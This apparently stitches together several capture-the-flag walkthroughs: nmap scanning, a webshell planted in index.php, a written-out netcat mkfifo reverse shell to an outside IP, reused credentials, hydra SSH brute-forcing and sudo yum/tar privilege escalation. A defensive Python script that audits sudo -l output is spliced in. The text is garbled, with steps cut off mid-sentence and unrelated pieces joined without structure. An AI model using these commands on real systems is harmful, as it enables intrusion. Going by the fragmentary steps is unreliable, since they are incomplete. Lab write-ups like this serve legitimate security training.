Let's Start !!! First start with the nmap scan. "nmap -sV -A -oN nmap/initial $IP" Scan all ports with rustscan because it's fast.
"Knock knock" was a hint at port knocking. If you want to know more about it, you can see this.
Finished !!!! :)
Let's Start !!! First start with the nmap scan. "nmap -sV -A -oN nmap/initial $IP -vv"
Log in to the website with the password and add a webshell to the index.php file. Now use the webshell to get a reverse shell. "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f" But before using it, encode it with a URL encoder.
If you open that file you will find some base64 codes. After decoding them you will see some interesting creds. You will find the password of root's mysql server, but it's also the ssh password of jjameson. 'sudo -l' You will see that you can run 'yum' as sudo.
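Seen from the defender's side, the 'sudo -l' result above is something to audit for. The following is an added example, not part of the original writeup: it parses 'sudo -l' output and flags rules that let a user run a shell-capable binary as root, such as yum here or tar in the next box. The sample output, the host name and the entries in RISKY other than yum and tar are constructed assumptions.

```python
import re

# Binaries that can run arbitrary commands when started through sudo.
# yum and tar come from this page; the rest is an assumed, non-exhaustive list.
RISKY = {"yum", "tar", "vi", "vim", "find", "less", "awk", "python3", "bash", "sh"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")   # "(root) NOPASSWD: /bin/x"
TAG = re.compile(r"^([A-Z_]+):\s*")                              # "NOPASSWD: ", "PASSWD: "

def audit_sudo_l(output):
    """Return (command, reason, nopasswd) for every risky rule in `sudo -l` output."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue                      # header and Defaults lines
        runas_user = m.group("runas").split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue                      # rule does not grant root
        nopasswd = False
        # Simplification: commas escaped as "\," inside arguments are not handled.
        for spec in m.group("rest").split(","):
            spec = spec.strip()
            while (t := TAG.match(spec)):  # a tag carries over to later commands
                if t.group(1) == "NOPASSWD":
                    nopasswd = True
                elif t.group(1) == "PASSWD":
                    nopasswd = False
                spec = spec[t.end():]
            if not spec:
                continue
            if spec == "ALL":
                findings.append(("ALL", "unrestricted root", nopasswd))
                continue
            path = spec.split()[0]
            if path.rsplit("/", 1)[-1] in RISKY:
                findings.append((path, "shell-capable binary", nopasswd))
    return findings

# Constructed sample output (not captured from the target machines).
SAMPLE = """Matching Defaults entries for jjameson on host:
    env_reset, mail_badpass

User jjameson may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /bin/tar, /usr/bin/uptime
"""

if __name__ == "__main__":
    for cmd, reason, nopasswd in audit_sudo_l(SAMPLE):
        print(f"{cmd}: {reason}{' (no password required)' if nopasswd else ''}")
```

Any rule it flags should be removed or replaced with a wrapper that fixes the arguments, since these binaries can run arbitrary commands as root.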
Finished !!!!! :)
Let's Start !!! First start with the nmap scan, "nmap -sV -A -oN nmap/initial $IP -vv" Found port 21 open, and ftp anonymous login is allowed. Found two files in the ftp folder.
Now brute-force the ssh service with hydra, and you will get the password :) Note: "bounty" in this photo is the IP of the target
"sudo -l" We can see that we can run tar as root. Now,
Finished!!!!! :)